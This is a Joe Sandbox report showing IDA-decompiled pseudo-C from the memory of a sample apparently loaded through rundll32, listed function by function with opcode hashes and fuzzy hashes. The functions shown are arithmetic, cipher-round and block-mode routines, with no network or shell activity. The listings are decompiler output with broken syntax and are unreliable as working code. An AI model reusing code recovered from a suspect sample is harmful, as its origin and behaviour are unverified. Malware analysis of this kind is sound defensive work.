                                        				_t72 = 0 | _t279 - _t148 > 0x00000000;
                                        				_t294 = _t290 + ( >=  ? _t249 : _t316) + _t317 + _t362 + _t362;
                                        				_t322 =  >=  ? _t254 : _t321;
                                        				_t31 = _t211 + 1; // 0x1
                                        				r10d = _t74;
                                        				r8d = r10d;
                                        				_t373 =  >=  ? _t211 : _t31;
                                        				_t256 = __rdx[4] >> 0x20;
                                        				r9d = _t72;
                                        				_t213 = __rdx[2] >> 0x20;
                                        				_t257 = _t256 * _t213;
                                        				_t324 = _t322 * _t213 + _t256 * _t349;
                                        				_t215 =  >=  ? _t257 : _t257 + 0;
                                        				_t216 = ( >=  ? _t257 : _t257 + 0) + (_t324 >> 0x20);
                                        				_t364 = _t362 * _t349 + (_t324 << 0x20);
                                        				_t259 =  >=  ? ( >=  ? _t257 : _t257 + 0) + (_t324 >> 0x20) : ( >=  ? _t257 : _t257 + 0) + (_t324 >> 0x20) + 1;
                                        				_t295 = _t290 + ( >=  ? _t249 : _t316) + _t317 + _t362 + _t362 + _t364;
                                        				_t36 = _t373 + 1; // 0x2
                                        				_t326 = _t259 + 1;
                                        				_t154 =  >=  ? _t259 : _t326;
                                        				_t281 = _t279 + _t322 + ( >=  ? _t259 : _t326);
                                        				_t218 =  >=  ? _t373 : _t36;
                                        				_t296 = _t290 + ( >=  ? _t249 : _t316) + _t317 + _t362 + _t362 + _t364 + _t364;
                                        				__rcx[3] = _t290 + ( >=  ? _t249 : _t316) + _t317 + _t362 + _t362 + _t364 + _t364;
                                        				r11d = 0;
                                        				_t327 =  >=  ? _t259 : _t326;
                                        				_t282 = _t279 + _t322 + ( >=  ? _t259 : _t326) + ( >=  ? _t259 : _t326);
                                        				_t39 = _t218 + 1; // 0x3
                                        				r9d = r8d;
                                        				_t185 =  >=  ?  >=  ? _t373 : _t36 : _t39;
                                        				_t75 = r9d;
                                        				_t329 = __rdx[4] >> 0x20;
                                        				_t260 = _t259 * _t329;
                                        				_t331 = _t329 * _t329 + (_t260 >> 0x1f);
                                        				_t351 = _t349 * _t349 + (_t260 << 0x21);
                                        				_t220 =  >=  ? _t331 : _t331 + 1;
                                        				r10d = _t75;
                                        				_t283 = _t279 + _t322 + ( >=  ? _t259 : _t326) + ( >=  ? _t259 : _t326) + _t351;
                                        				r8d = r10d;
                                        				_t158 =  >=  ?  >=  ? _t331 : _t331 + 1 : ( >=  ? _t331 : _t331 + 1) + 1;
                                        				_t186 = ( >=  ?  >=  ? _t373 : _t36 : _t39) + _t158;
                                        				r9d = _t72;
                                        				r11b = _t186 - _t158 > 0;
                                        				_t263 = __rdx[6] >> 0x20;
                                        				_t222 = __rdx[2] >> 0x20;
                                        				_t264 = _t263 * _t222;
                                        				_t333 = _t331 * _t222 + _t263 * _t351;
                                        				_t224 =  >=  ? _t264 : _t264 + 0;
                                        				_t225 = ( >=  ? _t264 : _t264 + 0) + (_t333 >> 0x20);
                                        				_t366 = _t364 * _t351 + (_t333 << 0x20);
                                        				_t266 =  >=  ? ( >=  ? _t264 : _t264 + 0) + (_t333 >> 0x20) : ( >=  ? _t264 : _t264 + 0) + (_t333 >> 0x20) + 1;
                                        				_t284 = _t279 + _t322 + ( >=  ? _t259 : _t326) + ( >=  ? _t259 : _t326) + _t351 + _t366;
                                        				_t47 = _t373 + 1; // 0x1
                                        				_t335 = _t266 + 1;
                                        				_t164 =  >=  ? _t266 : _t335;
                                        				_t187 = _t186 + ( >=  ? _t266 : _t335);
                                        				_t227 =  >=  ? _t373 : _t47;
                                        				_t285 = _t279 + _t322 + ( >=  ? _t259 : _t326) + ( >=  ? _t259 : _t326) + _t351 + _t366 + _t366;
                                        				__rcx[4] = _t279 + _t322 + ( >=  ? _t259 : _t326) + ( >=  ? _t259 : _t326) + _t351 + _t366 + _t366;
                                        				_t336 =  >=  ? _t266 : _t335;
                                        				_t188 = _t186 + ( >=  ? _t266 : _t335) + _t336;
                                        				r10d = _t75;
                                        				_t51 = _t227 + 1; // 0x2
                                        				r8d = r10d;
                                        				_t375 =  >=  ?  >=  ? _t373 : _t47 : _t51;
                                        				_t268 = __rdx[6] >> 0x20;
                                        				r9d = _t72;
                                        				_t229 = __rdx[4] >> 0x20;
                                        				_t269 = _t268 * _t229;
                                        				_t338 = _t336 * _t229 + _t268 * _t351;
                                        				_t231 =  >=  ? _t269 : _t269 + 0;
                                        				_t232 = ( >=  ? _t269 : _t269 + 0) + (_t338 >> 0x20);
                                        				_t368 = _t366 * _t351 + (_t338 << 0x20);
                                        				_t271 =  >=  ? ( >=  ? _t269 : _t269 + 0) + (_t338 >> 0x20) : ( >=  ? _t269 : _t269 + 0) + (_t338 >> 0x20) + 1;
                                        				_t189 = _t186 + ( >=  ? _t266 : _t335) + _t336 + _t368;
                                        				_t233 = _t271 + 1;
                                        				_t170 =  >=  ? _t271 : _t233;
                                        				_t376 = ( >=  ?  >=  ? _t373 : _t47 : _t51) + _t170;
                                        				bpl = _t376 - _t170 > 0;
                                        				_t190 = _t186 + ( >=  ? _t266 : _t335) + _t336 + _t368 + _t368;
                                        				__rcx[5] = _t186 + ( >=  ? _t266 : _t335) + _t336 + _t368 + _t368;
                                        				_t234 =  >=  ? _t271 : _t233;
                                        				r9d = r8d;
                                        				_t58 = _t298 + 1; // 0x1
                                        				_t377 = _t376 + ( >=  ? _t271 : _t233);
                                        				_t370 =  >=  ? _t298 : _t58;
                                        				_t341 = __rdx[6] >> 0x20;
                                        				_t272 = _t271 * _t341;
                                        				_t236 =  >=  ? _t341 * _t341 + (_t272 >> 0x1f) : _t341 * _t341 + (_t272 >> 0x1f) + 1;
                                        				_t378 = _t376 + ( >=  ? _t271 : _t233) + _t351 * _t351 + (_t272 << 0x21);
                                        				__rcx[6] = _t376 + ( >=  ? _t271 : _t233) + _t351 * _t351 + (_t272 << 0x21);
                                        				_t174 =  >=  ? _t236 : _t236 + 1;
                                        				_t175 = ( >=  ? _t236 : _t236 + 1) + ( >=  ? _t298 : _t58);
                                        				__rcx[7] = ( >=  ? _t236 : _t236 + 1) + ( >=  ? _t298 : _t58);
                                        				return __eax;
                                        			}




















































































                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f5fc642efadc7e88c3e8254d2ef716a313fd6999f0128ad5809c6a2515237471
                                        • Instruction ID: e2b6ff21c838881c54f6e39fc2bb990f76cc48ce628736a71e5b9a7759301134
                                        • Opcode Fuzzy Hash: f5fc642efadc7e88c3e8254d2ef716a313fd6999f0128ad5809c6a2515237471
                                        • Instruction Fuzzy Hash: 6AB118E1B0179C97CE08CF8AE5669D8E39AA36CFC0395E0279E0D57B55DA7DC285C340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 55%
                                        			E0000021E21EF305B5A0(long long _a24, long long _a32, signed char* _a40, intOrPtr _a48) {
                                        				signed char* _v48;
                                        				unsigned int _v52;
                                        				unsigned int _v56;
                                        				void* _t98;
                                        				void* _t101;
                                        				signed long long _t104;
                                        				long long _t107;
                                        				char* _t108;
                                        				signed char* _t110;
                                        				char* _t113;
                                        				signed char* _t115;
                                        				void* _t118;
                                        				void* _t122;
                                        				long long _t123;
                                        				void* _t125;
                                        				signed char* _t126;
                                        
                                        				_a24 = _t107;
                                        				_a32 = _t123;
                                        				E0000021E21EF310C220();
                                        				r11d = r8d;
                                        				_t108 = _t113;
                                        				_t126 = _t110;
                                        				if (_a48 == 0) goto 0xf305b850;
                                        				_t115 = _a40;
                                        				_v48 = _t115;
                                        				r10d =  *_t115 & 0x000000ff;
                                        				r8d = _t115[4] & 0x000000ff;
                                        				r10d = r10d << 0x18;
                                        				r10d = r10d | (_t115[1] & 0x000000ff) << 0x00000010;
                                        				r8d = r8d << 0x18;
                                        				r10d = r10d | (_t115[2] & 0x000000ff) << 0x00000008;
                                        				r10d = r10d | _t115[3] & 0x000000ff;
                                        				r8d = r8d | (_t115[5] & 0x000000ff) << 0x00000010;
                                        				r8d = r8d | (_t115[6] & 0x000000ff) << 0x00000008;
                                        				r8d = r8d | _t115[7] & 0x000000ff;
                                        				_t101 = _t125 - 8;
                                        				if (_t101 < 0) goto 0xf305b70e;
                                        				r15d = _t118 + 8;
                                        				_t98 = _t118 + _t104 * 8;
                                        				asm("o16 nop [eax+eax]");
                                        				_v56 = (( *_t126 & 0x000000ff) << 0x00000018 | (_t126[1] & 0x000000ff) << 0x00000010 | (_t126[2] & 0x000000ff) << 0x00000008 | _t126[3] & 0x000000ff) ^ r10d;
                                        				_v52 = ((_t126[4] & 0x000000ff) << 0x00000018 | (_t126[5] & 0x000000ff) << 0x00000010 | (_t126[6] & 0x000000ff) << 0x00000008 | _t126[7] & 0x000000ff) ^ r8d;
                                        				E0000021E21EF305BFF0(_t104, _t108,  &_v56, _a32, _a32, _t118, _t122, _t123);
                                        				r10d = _v56;
                                        				r8d = _v52;
                                        				 *_t108 = r10d >> 0x18;
                                        				 *((char*)(_t108 + 1)) = r10d >> 0x10;
                                        				 *((char*)(_t108 + 2)) = r10d >> 8;
                                        				 *((char*)(_t108 + 3)) = r10b & 0xffffffff;
                                        				 *((char*)(_t108 + 4)) = r8d >> 0x18;
                                        				 *((char*)(_t108 + 5)) = r8d >> 0x10;
                                        				 *((char*)(_t108 + 6)) = r8d >> 8;
                                        				 *((char*)(_t108 + 7)) = r8b & 0xffffffff;
                                        				if (_t101 != 0) goto 0xf305b650;
                                        				if (_t98 == 0xfffffff8) goto 0xf305b802;
                                        				if (_t98 + 7 - 7 > 0) goto 0xf305b79e;
                                        				goto __rax;
                                        			}




















                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b1616f1bb7c7554a1bcb13969827717853a5f7c3710f740d4e99a18627326a40
                                        • Instruction ID: 9edbfb61ee081051e59fb3a5cec94e8f9203564495a552b25f48fffde4444d3c
                                        • Opcode Fuzzy Hash: b1616f1bb7c7554a1bcb13969827717853a5f7c3710f740d4e99a18627326a40
                                        • Instruction Fuzzy Hash: DAD1A0236191F08EE315CB7D48045AD7FE1E3A238974A8156EFE4D7B86C63CD616C7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 58%
                                        			E0000021E21EF3051B60(long long _a16, long long _a24, void* _a32, signed char* _a40, intOrPtr _a48) {
                                        				unsigned int _v52;
                                        				unsigned int _v56;
                                        				void* _t103;
                                        				void* _t106;
                                        				signed long long _t109;
                                        				long long _t112;
                                        				char* _t113;
                                        				signed char* _t115;
                                        				char* _t118;
                                        				signed char* _t120;
                                        				long long _t123;
                                        				signed int _t127;
                                        				unsigned int _t128;
                                        				void* _t130;
                                        				signed char* _t131;
                                        				signed char* _t132;
                                        
                                        				_a16 = _t112;
                                        				_a24 = _t123;
                                        				_a32 = _t128;
                                        				E0000021E21EF310C220();
                                        				r11d = r8d;
                                        				_t113 = _t118;
                                        				_t132 = _t115;
                                        				if (_a48 == 0) goto 0xf3051e0e;
                                        				_t131 = _a40;
                                        				_t120 =  &(_t131[1]);
                                        				r8d = _t120[3] & 0x000000ff;
                                        				r10d =  *_t131 & 0x000000ff;
                                        				r10d = r10d | (_t131[1] & 0x000000ff) << 0x00000008;
                                        				r10d = r10d | (_t120[1] & 0x000000ff) << 0x00000010;
                                        				_a40 = _t120;
                                        				r10d = r10d | (_t120[2] & 0x000000ff) << 0x00000018;
                                        				r8d = r8d | (_t120[4] & 0x000000ff) << 0x00000008;
                                        				r8d = r8d | ((_t120[6] & 0x000000ff) << 0x00000008 | _t120[5] & 0x000000ff) << 0x00000010;
                                        				_t106 = _t130 - 8;
                                        				if (_t106 < 0) goto 0xf3051cd4;
                                        				r15d = _t123 + 8;
                                        				_t103 = _t123 + _t109 * 8;
                                        				_v56 = ( *_t132 & 0x000000ff | (_t132[1] & 0x000000ff) << 0x00000008 | (_t132[2] & 0x000000ff) << 0x00000010 | (_t132[3] & 0x000000ff) << 0x00000018) ^ r10d;
                                        				r8d = 1;
                                        				_v52 = (_t132[4] & 0x000000ff | (_t132[5] & 0x000000ff) << 0x00000008 | (_t132[6] & 0x000000ff) << 0x00000010 | (_t132[7] & 0x000000ff) << 0x00000018) ^ r8d;
                                        				E0000021E21EF304F380(_t109, _t113,  &_v56, _a32, _a32, _t123, _t127, _t128);
                                        				r10d = _v56;
                                        				r8d = _v52;
                                        				 *_t113 = r10b & 0xffffffff;
                                        				 *((char*)(_t113 + 1)) = r10d >> 8;
                                        				 *((char*)(_t113 + 2)) = r10d >> 0x10;
                                        				 *((char*)(_t113 + 3)) = r10d >> 0x18;
                                        				 *((char*)(_t113 + 4)) = r8b & 0xffffffff;
                                        				 *((char*)(_t113 + 5)) = r8d >> 8;
                                        				 *((char*)(_t113 + 6)) = r8d >> 0x10;
                                        				 *((char*)(_t113 + 7)) = r8d >> 0x18;
                                        				if (_t106 != 0) goto 0xf3051c10;
                                        				if (_t103 == 0xfffffff8) goto 0xf3051dce;
                                        				if (_t103 + 7 - 7 > 0) goto 0xf3051d64;
                                        				goto __rax;
                                        			}




















                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 518610866154c911e9bacc9c7fceac0bd2731ddbd4abd23ac5feda18c1cedccd
                                        • Instruction ID: f796f312d0a8a22bb56c141b840bbb6859d8845679e24b7cd4a3f135631ade90
                                        • Opcode Fuzzy Hash: 518610866154c911e9bacc9c7fceac0bd2731ddbd4abd23ac5feda18c1cedccd
                                        • Instruction Fuzzy Hash: DFD1D1236191F08EE705CB7D48045AD7FE1E3A238974AC156EFE587B86C63CD616C7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 47%
                                        			E0000021E21EF3057D20(long long _a24, long long _a32, signed char* _a40, intOrPtr _a48) {
                                        				signed char* _v48;
                                        				unsigned int _v52;
                                        				unsigned int _v56;
                                        				void* _t100;
                                        				void* _t103;
                                        				signed long long _t106;
                                        				long long _t109;
                                        				char* _t110;
                                        				signed char* _t112;
                                        				char* _t115;
                                        				signed char* _t117;
                                        				void* _t120;
                                        				long long _t124;
                                        				void* _t126;
                                        				signed char* _t127;
                                        
                                        				_a24 = _t109;
                                        				_a32 = _t124;
                                        				E0000021E21EF310C220();
                                        				r11d = r8d;
                                        				_t110 = _t115;
                                        				_t127 = _t112;
                                        				if (_a48 == 0) goto 0xf3057fbf;
                                        				_t117 = _a40;
                                        				_v48 = _t117;
                                        				r10d =  *_t117 & 0x000000ff;
                                        				r8d = _t117[4] & 0x000000ff;
                                        				r10d = r10d | (_t117[1] & 0x000000ff) << 0x00000008;
                                        				r10d = r10d | (_t117[2] & 0x000000ff) << 0x00000010;
                                        				r10d = r10d | (_t117[3] & 0x000000ff) << 0x00000018;
                                        				r8d = r8d | (_t117[5] & 0x000000ff) << 0x00000008;
                                        				r8d = r8d | (_t117[6] & 0x000000ff) << 0x00000010;
                                        				r8d = r8d | (_t117[7] & 0x000000ff) << 0x00000018;
                                        				_t103 = _t126 - 8;
                                        				if (_t103 < 0) goto 0xf3057e7f;
                                        				r15d = _t120 + 8;
                                        				_t100 = _t120 + _t106 * 8;
                                        				_v56 = ( *_t127 & 0x000000ff | (_t127[1] & 0x000000ff) << 0x00000008 | (_t127[2] & 0x000000ff) << 0x00000010 | (_t127[3] & 0x000000ff) << 0x00000018) ^ r10d;
                                        				_v52 = (_t127[4] & 0x000000ff | (_t127[5] & 0x000000ff) << 0x00000008 | (_t127[6] & 0x000000ff) << 0x00000010 | (_t127[7] & 0x000000ff) << 0x00000018) ^ r8d;
                                        				E0000021E21EF30583D0(_t103, _t110,  &_v56, _a32, _a32, _t120,  &(_t127[8]));
                                        				r10d = _v56;
                                        				r8d = _v52;
                                        				 *_t110 = r10b & 0xffffffff;
                                        				 *((char*)(_t110 + 1)) = r10d >> 8;
                                        				 *((char*)(_t110 + 2)) = r10d >> 0x10;
                                        				 *((char*)(_t110 + 3)) = r10d >> 0x18;
                                        				 *((char*)(_t110 + 4)) = r8b & 0xffffffff;
                                        				 *((char*)(_t110 + 5)) = r8d >> 8;
                                        				 *((char*)(_t110 + 6)) = r8d >> 0x10;
                                        				 *((char*)(_t110 + 7)) = r8d >> 0x18;
                                        				if (_t103 != 0) goto 0xf3057dc1;
                                        				if (_t100 == 0xfffffff8) goto 0xf3057f73;
                                        				if (_t100 + 7 - 7 > 0) goto 0xf3057f0f;
                                        				goto __rax;
                                        			}



















                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e7f26bff4a57c9160168a585683446cd362b5bdb692baa2ef5922b67796ddb81
                                        • Instruction ID: 85173776e3459c87aeed8ea0498029ee4f133e80536c5a84c2d8d43a378971c9
                                        • Opcode Fuzzy Hash: e7f26bff4a57c9160168a585683446cd362b5bdb692baa2ef5922b67796ddb81
                                        • Instruction Fuzzy Hash: 06D1BE23A191E08EE316CB7D48045AD7FE1E3A238974A8256EFE4C7B86C53CD616C760
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 78%
                                        			E0000021E21EF305BB10(unsigned int __rax, long long __rbx, signed int __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, unsigned int __r8, unsigned int __r9, long long _a8, long long _a16, long long _a24) {
                                        				signed int _t303;
                                        				signed int _t304;
                                        				signed int _t305;
                                        				signed int _t306;
                                        				signed int _t307;
                                        				signed int _t308;
                                        				signed int _t309;
                                        				signed int _t310;
                                        				unsigned long long _t423;
                                        				signed long long _t425;
                                        				unsigned long long _t426;
                                        				unsigned long long _t428;
                                        				unsigned long long _t429;
                                        				signed long long _t431;
                                        				unsigned long long _t432;
                                        				signed long long _t433;
                                        				unsigned long long _t434;
                                        				unsigned long long _t435;
                                        				signed long long _t437;
                                        				unsigned long long _t438;
                                        				signed long long _t439;
                                        				unsigned long long _t440;
                                        				unsigned long long _t441;
                                        				signed long long _t443;
                                        				unsigned long long _t444;
                                        				signed long long _t445;
                                        				unsigned long long _t446;
                                        				unsigned long long _t447;
                                        				signed long long _t449;
                                        				unsigned long long _t450;
                                        				unsigned long long _t452;
                                        				unsigned long long _t453;
                                        				signed long long _t454;
                                        				unsigned long long _t468;
                                        				unsigned long long _t471;
                                        				unsigned long long _t474;
                                        
                                        				_a8 = __rbx;
                                        				_a16 = __rsi;
                                        				_a24 = __rdi;
                                        				r11d =  *__rcx;
                                        				_t303 =  *(__rcx + 4);
                                        				if ( *((intOrPtr*)(__rdx + 0x80)) != 0) goto 0xf305bc64;
                                        				r8d =  *(__rdx + 0x78);
                                        				r8d = r8d + _t303;
                                        				asm("inc ecx");
                                        				_t423 = __rax >> 8;
                                        				r9d = r8d;
                                        				r11d = r11d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) ^  *(0x21ef2fe0000 + 0x18e200 + _t423 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + __rcx * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + (__r9 >> 0x18) * 4));
                                        				asm("rol eax, cl");
                                        				r8d =  *((intOrPtr*)(__rdx + 0x70)) - r11d;
                                        				_t425 = _t423 >> 0x10 >> 8;
                                        				_t426 = _t425 >> 0x18;
                                        				_t304 = _t303 ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t425 * 4)) ^  *(0x21ef2fe0000 + 0x18e600 + _t426 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + _t426 * 4));
                                        				asm("rol eax, cl");
                                        				r8d =  *(__rdx + 0x68) ^ _t304;
                                        				_t428 = _t426 >> 8 >> 0x18;
                                        				r11d = r11d ^  *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t428 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t428 * 4)) ^  *(0x21ef2fe0000 + 0x18ea00 + _t428 * 4);
                                        				asm("rol edx, cl");
                                        				r8d =  *((intOrPtr*)(__rdx + 0x60)) + r11d;
                                        				_t429 = _t428 >> 8;
                                        				_t468 = __r8 >> 0x10 >> 0x10 >> 0x18;
                                        				_t305 = _t304 ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) ^  *(0x21ef2fe0000 + 0x18e200 + _t429 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + __rcx * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t468 * 4));
                                        				asm("rol eax, cl");
                                        				r8d =  *((intOrPtr*)(__rdx + 0x58)) - _t305;
                                        				_t431 = _t429 >> 0x10 >> 8;
                                        				_t432 = _t431 >> 0x18;
                                        				r11d = r11d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t431 * 4)) ^  *(0x21ef2fe0000 + 0x18e600 + _t432 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + _t432 * 4));
                                        				asm("rol eax, cl");
                                        				r8d =  *(__rdx + 0x50) ^ r11d;
                                        				_t433 = _t432 >> 8;
                                        				_t434 = _t433 >> 0x18;
                                        				_t306 = _t305 ^  *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t433 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t434 * 4)) ^  *(0x21ef2fe0000 + 0x18ea00 + _t434 * 4);
                                        				asm("rol edx, cl");
                                        				r8d =  *((intOrPtr*)(__rdx + 0x48)) + _t306;
                                        				_t435 = _t434 >> 8;
                                        				_t471 = _t468 >> 0x10 >> 0x10 >> 0x18;
                                        				r11d = r11d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) ^  *(0x21ef2fe0000 + 0x18e200 + _t435 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + __rcx * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t471 * 4));
                                        				asm("rol eax, cl");
                                        				r8d =  *((intOrPtr*)(__rdx + 0x40)) - r11d;
                                        				_t437 = _t435 >> 0x10 >> 8;
                                        				_t438 = _t437 >> 0x18;
                                        				_t307 = _t306 ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t437 * 4)) ^  *(0x21ef2fe0000 + 0x18e600 + _t438 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + _t438 * 4));
                                        				asm("rol eax, cl");
                                        				r8d =  *(__rdx + 0x38) ^ _t307;
                                        				_t439 = _t438 >> 8;
                                        				_t440 = _t439 >> 0x18;
                                        				r11d = r11d ^  *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t439 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t440 * 4)) ^  *(0x21ef2fe0000 + 0x18ea00 + _t440 * 4);
                                        				asm("rol edx, cl");
                                        				r8d =  *((intOrPtr*)(__rdx + 0x30)) + r11d;
                                        				_t441 = _t440 >> 8;
                                        				_t474 = _t471 >> 0x10 >> 0x10 >> 0x18;
                                        				_t308 = _t307 ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) ^  *(0x21ef2fe0000 + 0x18e200 + _t441 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + __rcx * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t474 * 4));
                                        				asm("rol eax, cl");
                                        				r8d =  *((intOrPtr*)(__rdx + 0x28)) - _t308;
                                        				_t443 = _t441 >> 0x10 >> 8;
                                        				_t444 = _t443 >> 0x18;
                                        				r11d = r11d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t443 * 4)) ^  *(0x21ef2fe0000 + 0x18e600 + _t444 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + _t444 * 4));
                                        				asm("rol eax, cl");
                                        				r8d =  *(__rdx + 0x20) ^ r11d;
                                        				_t445 = _t444 >> 8;
                                        				_t446 = _t445 >> 0x18;
                                        				_t309 = _t308 ^  *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t445 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t446 * 4)) ^  *(0x21ef2fe0000 + 0x18ea00 + _t446 * 4);
                                        				asm("rol edx, cl");
                                        				r8d =  *((intOrPtr*)(__rdx + 0x18)) + _t309;
                                        				_t447 = _t446 >> 8;
                                        				r11d = r11d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) ^  *(0x21ef2fe0000 + 0x18e200 + _t447 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + __rcx * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + (_t474 >> 0x10 >> 0x10 >> 0x18) * 4));
                                        				asm("rol eax, cl");
                                        				r8d =  *((intOrPtr*)(__rdx + 0x10)) - r11d;
                                        				_t449 = _t447 >> 0x10 >> 8;
                                        				_t450 = _t449 >> 0x18;
                                        				_t310 = _t309 ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t449 * 4)) ^  *(0x21ef2fe0000 + 0x18e600 + _t450 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + _t450 * 4));
                                        				asm("rol eax, cl");
                                        				r8d =  *(__rdx + 8) ^ _t310;
                                        				_t452 = _t450 >> 8 >> 0x18;
                                        				r11d = r11d ^  *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t452 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t452 * 4)) ^  *(0x21ef2fe0000 + 0x18ea00 + _t452 * 4);
                                        				asm("rol edx, cl");
                                        				_t453 = _t452 >> 8;
                                        				r9d =  *__rdx + r11d;
                                        				r8d =  *(0x21ef2fe0000 + 0x18de00 + __rcx * 4);
                                        				r10d =  *(0x21ef2fe0000 + 0x18e200 + _t453 * 4);
                                        				r10d = r10d ^ r8d;
                                        				_t454 = _t453 >> 0x18;
                                        				r10d = r10d -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t454 * 4));
                                        				r10d = r10d +  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + _t454 * 4));
                                        				r10d = r10d ^ _t310;
                                        				 *__rcx = r10d;
                                        				 *(__rcx + 4) = r11d;
                                        				return r9b & 0xffffffff;
                                        			}








































                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b41ee9bc1897a1619e1ee9772c7ef9173bc46fb8038824e0ae975aff062e2510
                                        • Instruction ID: 19e2c2473f859842d30f605558877550438bd258467ee9c2aa3bc6f9625f75c4
                                        • Opcode Fuzzy Hash: b41ee9bc1897a1619e1ee9772c7ef9173bc46fb8038824e0ae975aff062e2510
                                        • Instruction Fuzzy Hash: 88C144722202248BD725CF2DE8C886A77E2F3A9749BC49614FBC697789D53DF504CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0000021E21EF3059100(signed int __rax, unsigned int __rcx, unsigned int __rdx, signed int __r8) {
                                        				unsigned long long _t464;
                                        				unsigned long long _t465;
                                        				unsigned long long _t466;
                                        				unsigned long long _t467;
                                        				unsigned long long _t468;
                                        				unsigned long long _t469;
                                        				unsigned long long _t470;
                                        				unsigned long long _t471;
                                        				unsigned long long _t472;
                                        				unsigned long long _t473;
                                        				unsigned long long _t474;
                                        				unsigned long long _t475;
                                        				unsigned long long _t476;
                                        				unsigned long long _t477;
                                        
                                        				r9d =  *(__rdx + 0x44);
                                        				r9d = r9d ^  *__rcx;
                                        				r8d = r9d >> 0x00000010 & 0x000000ff;
